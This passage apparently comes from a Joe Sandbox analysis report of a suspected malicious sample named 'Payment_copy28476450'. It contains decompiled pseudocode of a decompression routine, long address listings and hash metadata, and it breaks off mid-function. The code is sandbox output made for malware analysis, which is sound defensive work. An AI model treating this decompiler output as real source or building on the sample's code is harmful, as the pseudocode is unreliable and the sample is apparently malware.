												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x004066f0
0x004066f0
0x004066f4
0x00406701
0x0040670b
0x00000000
0x004066f6
0x004066f6
0x00406731
0x00406734
0x00406737
0x0040673a
0x0040673a
0x0040673d
0x00406744
0x00406749
0x0040662a
0x0040662d
0x0040699f
0x0040699f
0x0040699f
0x004069a2
0x004069a2
0x004069a2
0x004069a8
0x004069ae
0x004069b4
0x004069ce
0x004069d1
0x004069d7
0x004069e2
0x004069e4
0x004069b6
0x004069b6
0x004069c5
0x004069c9
0x004069c9
0x004069ee
0x00000000
0x00000000
0x004069f0
0x004069f4
0x00406ba3
0x00406bb9
0x00406bc1
0x00406bc8
0x00406bca
0x00406bd1
0x00406bd5
0x00406bd5
0x00406a00
0x00406a07
0x00406a0f
0x00406a12
0x00406a15
0x00406a15
0x00406a1b
0x00406a1b
0x004061b7
0x004061b7
0x004061b7
0x004061c0
0x00000000
0x00000000
0x004061c6
0x00000000
0x004061d1
0x00000000
0x00000000
0x004061da
0x004061dd
0x004061e0
0x004061e4
0x00000000
0x00000000
0x004061ea
0x004061ed
0x004061ef
0x004061f0
0x004061f3
0x004061f5
0x004061f6
0x004061f8
0x004061fb
0x00406200
0x00406205
0x0040620e
0x00406221
0x00406224
0x00406230
0x00406258
0x0040625a
0x00406268
0x00406268
0x0040626c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040625c
0x0040625c
0x0040625f
0x00406260
0x00406260
0x00000000
0x0040625c
0x00406236
0x0040623b
0x0040623b
0x00406244
0x0040624c
0x0040624f
0x00000000
0x00406255
0x00406255
0x00000000
0x00406255
0x00000000
0x00406272
0x00406272
0x00406276
0x00406b22
0x00000000
0x00406b22
0x0040627f
0x0040628f
0x00406292
0x00406295
0x00406295
0x00406295
0x00406298
0x0040629c
0x00000000
0x00000000
0x0040629e
0x004062a4
0x004062ce
0x004062d4
0x004062db
0x00000000
0x004062db
0x004062aa
0x004062ad
0x004062b2
0x004062b2
0x004062bd
0x004062c5
0x004062c8
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040630d
0x00406313
0x00406316
0x00406323
0x0040632b
0x0040699f
0x0040699f
0x00000000
0x00000000
0x004062e2
0x004062e2
0x004062e6
0x00406b31
0x00000000
0x00406b31
0x004062f2
0x004062fd
0x004062fd
0x004062fd
0x00406300
0x00406303
0x00406306
0x0040630b
0x00000000
0x00000000
0x00000000
0x00000000
0x004069a2
0x004069a2
0x004069a8
0x004069ae
0x004069b4
0x004069ce
0x004069d1
0x004069d7
0x004069e2
0x004069e4
0x004069b6
0x004069b6
0x004069c5
0x004069c9
0x004069c9
0x004069ee
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406333
0x00406335
0x00406338
0x004063a9
0x004063ac
0x004063af
0x004063b6
0x004063c0
0x0040699f
0x0040699f
0x0040699f
0x00000000
0x0040699f
0x0040699f
0x0040633a
0x0040633e
0x00406341
0x00406343
0x00406346
0x00406349
0x0040634b
0x0040634e
0x00406350
0x00406355
0x00406358
0x0040635b
0x0040635f
0x00406366
0x00406369
0x00406370
0x00406374
0x0040637c
0x0040637c
0x0040637c
0x00406376
0x00406376
0x00406376
0x0040636b
0x0040636b
0x0040636b
0x00406380
0x00406383
0x004063a1
0x004063a3
0x00000000
0x00406385
0x00406385
0x00406388
0x0040638b
0x0040638e
0x00406390
0x00406390
0x00406390
0x00406393
0x00406396
0x00406398
0x00406399
0x0040639c
0x00000000
0x0040639c
0x00000000
0x004065d2
0x004065d6
0x004065f4
0x004065f7
0x004065fe
0x00406601
0x00406604
0x00406607
0x0040660a
0x0040660d
0x0040660f
0x00406616
0x00406617
0x00406619
0x0040661c
0x0040661f
0x00406622
0x00406622
0x00406627
0x00000000
0x00406627
0x004065d8
0x004065db
0x004065de
0x004065e8
0x0040699f
0x0040699f
0x0040699f
0x00000000
0x0040699f
0x00000000
0x0040663c
0x00406640
0x00406663
0x00406666
0x00406669
0x00406673
0x00406642
0x00406642
0x00406645
0x00406648
0x0040664b
0x00406658
0x0040665b
0x0040665b
0x0040699f
0x0040699f
0x0040699f
0x00000000
0x0040699f
0x00000000
0x0040667f
0x00406683
0x00000000
0x00000000
0x00406689
0x0040668d
0x00000000
0x00000000
0x00406693
0x00406695
0x00406699
0x00406699
0x0040669c
0x004066a0
0x00000000
0x00000000
0x00000000
0x00000000
0x00406717
0x0040671b
0x00406722
0x00406725
0x00406728
0x0040671d
0x0040671d
0x0040671d
0x0040672b
0x0040672e
0x00000000
0x00000000
0x004067d7
0x004067d7
0x004067db
0x00406b79
0x00000000
0x00406b79
0x004067e1
0x004067e4
0x004067e7
0x004067eb
0x004067ee
0x004067f4
0x004067f6
0x004067f6
0x004067f6
0x004067f9
0x004067fc
0x00000000
0x00000000
0x004063cc
0x004063cc
0x004063d0
0x00406b3d
0x00000000
0x00406b3d
0x004063d6
0x004063d9
0x004063dc
0x004063e0
0x004063e3
0x004063e9
0x004063eb
0x004063eb
0x004063eb
0x004063ee
0x004063f1
0x004063f1
0x004063f4
0x004063f7
0x00000000
0x00000000
0x004063fd
0x00406403
0x00000000
0x00000000
0x00406409
0x00406409
0x0040640d
0x00406410
0x00406413
0x00406416
0x00406419
0x0040641a
0x0040641d
0x0040641f
0x00406425
0x00406428
0x0040642b
0x0040642e
0x00406431
0x00406434
0x00406437
0x00406453
0x00406456
0x00406459
0x0040645c
0x00406463
0x00406467
0x00406469
0x0040646d
0x00406439
0x00406439
0x0040643d
0x00406445
0x0040644a
0x0040644c
0x0040644e
0x0040644e
0x00406470
0x00406477
0x0040647a
0x00000000
0x00406480
0x00000000
0x00406480
0x00000000
0x00406485
0x00406485
0x00406489
0x00406b49
0x00000000
0x00406b49
0x0040648f
0x00406492
0x00406495
0x00406499
0x0040649c
0x004064a2
0x004064a4
0x004064a4
0x004064a4
0x004064a7
0x004064aa
0x004064aa
0x004064aa
0x004064b0
0x00000000
0x00000000
0x004064b2
0x004064b5
0x004064b8
0x004064bb
0x004064be
0x004064c1
0x004064c4
0x004064c7
0x004064ca
0x004064cd
0x004064d0
0x004064e8
0x004064eb
0x004064ee
0x004064f1
0x004064f1
0x004064f4
0x004064f8
0x004064fa
0x004064d2
0x004064d2
0x004064da
0x004064df
0x004064e1
0x004064e3
0x004064e3
0x004064fd
0x00406504
0x00406507
0x00000000
0x00406509
0x00000000
0x00406509
0x00406507
0x0040650e
0x0040650e
0x0040650e
0x0040650e
0x00000000
0x00000000
0x00406549
0x00406549
0x0040654d
0x00406b55
0x00000000
0x00406b55
0x00406553
0x00406556
0x00406559
0x0040655d
0x00406560
0x00406566
0x00406568
0x00406568
0x00406568
0x0040656b
0x0040656e
0x0040656e
0x00406574
0x00406512
0x00406512
0x00406515
0x00000000
0x00406515
0x00406576
0x00406576
0x00406579
0x0040657c
0x0040657f
0x00406582
0x00406585
0x00406588
0x0040658b
0x0040658e
0x00406591
0x00406594
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b5
0x004065b8
0x004065bc
0x004065be
0x00406596
0x00406596
0x0040659e
0x004065a3
0x004065a5
0x004065a7
0x004065a7
0x004065c1
0x004065c8
0x004065cb
0x00000000
0x004065cd
0x00000000
0x004065cd
0x00000000
0x0040685a
0x0040685a
0x0040685e
0x00406b85
0x00000000
0x00406b85
0x00406864
0x00406867
0x0040686a
0x0040686e
0x00406871
0x00406877
0x00406879
0x00406879
0x00406879
0x0040687c
0x00000000
0x00000000
0x00000000
0x00000000
0x00406969
0x0040696d
0x0040698f
0x00406992
0x0040699c
0x0040699f
0x0040699f
0x0040699f
0x00000000
0x0040699f
0x0040699f
0x0040696f
0x00406972
0x00406976
0x00406979
0x00406979
0x0040697c
0x00000000
0x00000000
0x00406a26
0x00406a2a
0x00406a48
0x00406a48
0x00406a48
0x00406a4f
0x00406a56
0x00406a5d
0x00406a5d
0x00000000
0x00406a5d
0x00406a2c
0x00406a2f
0x00406a32
0x00406a35
0x00406a3c
0x00406980
0x00406980
0x00406983
0x00000000
0x00000000
0x00406b17
0x00406b1a
0x00406a1b
0x00000000
0x00000000
0x00406751
0x00406753
0x0040675a
0x0040675b
0x0040675d
0x00406760
0x00000000
0x00000000
0x00406768
0x0040676b
0x0040676e
0x00406770
0x00406772
0x00406772
0x00406773
0x00406776
0x0040677d
0x00406780
0x0040678e
0x00000000
0x00000000
0x00406a64
0x00406a64
0x00406a67
0x00406a6e
0x00000000
0x00000000
0x00406a73
0x00406a73
0x00406a77
0x00406baf
0x00000000
0x00406baf
0x00406a7d
0x00406a80
0x00406a83
0x00406a87
0x00406a8a
0x00406a90
0x00406a92
0x00406a92
0x00406a92
0x00406a95
0x00406a98
0x00406a98
0x00406a98
0x00406a98
0x00406a9b
0x00406a9b
0x00406a9f
0x00406aff
0x00406b02
0x00406b07
0x00406b08
0x00406b0a
0x00406b0c
0x00406b0f
0x00406a1b
0x00406a1b
0x00000000
0x00406a21
0x00406a1b
0x00406aa1
0x00406aa7
0x00406aaa
0x00406aad
0x00406ab0
0x00406ab3
0x00406ab6
0x00406ab9
0x00406abc
0x00406abf
0x00406ac2
0x00406adb
0x00406ade
0x00406ae1
0x00406ae4
0x00406ae8
0x00406aea
0x00406aea
0x00406aeb
0x00406aee
0x00406ac4
0x00406ac4
0x00406acc
0x00406ad1
0x00406ad3
0x00406ad6
0x00406ad6
0x00406af1
0x00406af8
0x00000000
0x00406afa
0x00000000
0x00406afa
0x00000000
0x00406796
0x00406799
0x004067cf
0x004068ff
0x004068ff
0x004068ff
0x004068ff
0x00406902
0x00406902
0x00406905
0x00406907
0x00406b91
0x00000000
0x00406b91
0x0040690d
0x00406910
0x00000000
0x00000000
0x00406916
0x0040691a
0x0040691d
0x0040691d
0x0040691d
0x00000000
0x0040691d
0x0040679b
0x0040679d
0x0040679f
0x004067a1
0x004067a4
0x004067a5
0x004067a7
0x004067a9
0x004067ac
0x004067af
0x004067c5
0x004067ca
0x00406802
0x00406802
0x00406806
0x00406832
0x00406834
0x0040683b
0x0040683e
0x00406841
0x00406841
0x00406846
0x00406846
0x00406848
0x0040684b
0x00406852
0x00406855
0x00406882
0x00406882
0x00406885
0x00406888
0x004068fc
0x004068fc
0x004068fc
0x00000000
0x004068fc
0x0040688a
0x00406890
0x00406893
0x00406896
0x00406899
0x0040689c
0x0040689f
0x004068a2
0x004068a5
0x004068a8
0x004068ab
0x004068c4
0x004068c6
0x004068c9
0x004068ca
0x004068cd
0x004068cf
0x004068d2
0x004068d4
0x004068d6
0x004068d9
0x004068db
0x004068de
0x004068e2
0x004068e4
0x004068e4
0x004068e5
0x004068e8
0x004068eb
0x004068ad
0x004068ad
0x004068b5
0x004068ba
0x004068bc
0x004068bf
0x004068bf
0x004068ee
0x004068f5
0x0040687f
0x0040687f
0x0040687f
0x0040687f
0x00000000
0x004068f7
0x00000000
0x004068f7
0x004068f5
0x00406808
0x0040680b
0x0040680d
0x00406810
0x00406813
0x00406816
0x00406818
0x0040681b
0x0040681e
0x0040681e
0x00406821
0x00406821
0x00406824
0x0040682b
0x004067ff
0x004067ff
0x004067ff
0x004067ff
0x00000000
0x0040682d
0x00000000
0x0040682d
0x0040682b
0x004067b1
0x004067b4
0x004067b6
0x004067b9
0x00000000
0x00000000
0x00406518
0x00406518
0x0040651c
0x00406b61
0x00000000
0x00406b61
0x00406522
0x00406525
0x00406528
0x0040652b
0x0040652e
0x00406531
0x00406534
0x00406536
0x00406539
0x0040653c
0x0040653f
0x00406541
0x00406541
0x00406541
0x00000000
0x00000000
0x004066a3
0x004066a3
0x004066a7
0x00406b6d
0x00000000
0x00406b6d
0x004066ad
0x004066b0
0x004066b3
0x004066b6
0x004066b8
0x004066b8
0x004066b8
0x004066bb
0x004066be
0x004066c1
0x004066c4
0x004066c7
0x004066ca
0x004066cb
0x004066cd
0x004066cd
0x004066cd
0x004066d0
0x004066d3
0x004066d6
0x004066d9
0x004066d9
0x004066d9
0x004066dc
0x004066de
0x004066de
0x00000000
0x00000000
0x00406920
0x00406920
0x00406920
0x00406924
0x00000000
0x00000000
0x0040692a
0x0040692d
0x00406930
0x00406933
0x00406935
0x00406935
0x00406935
0x00406938
0x0040693b
0x0040693e
0x00406941
0x00406944
0x00406947
0x00406948
0x0040694a
0x0040694a
0x0040694a
0x0040694d
0x00406950
0x00406953
0x00406956
0x00406959
0x0040695d
0x0040695f
0x00406962
0x00000000
0x00406964
0x004066e1
0x004066e1
0x00000000
0x004066e1
0x00406962
0x00406b97
0x00000000
0x00000000
0x004061c6
0x00406bce
0x00406bce
0x00000000
0x00406bce
0x00406a1b
0x004069a2
0x0040699f
0x00000000
0x004066f4

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 804fba803cbd16a140b159ae7d26de6fa0620b5d9a2f4af6b8021cca2140f9f9
Instruction ID: 7be6eb69932b41c0b27de07e5fb880b338722213318b425ba270fb710fdbb197
Opcode Fuzzy Hash: 804fba803cbd16a140b159ae7d26de6fa0620b5d9a2f4af6b8021cca2140f9f9
Instruction Fuzzy Hash: FE714671E00228CBDF28CF98C8447ADBBB1FB44305F15816ED856BB281C778AA96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 0040663C Relevance: 5.2, APIs: 4, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040663C() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00406BD6))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
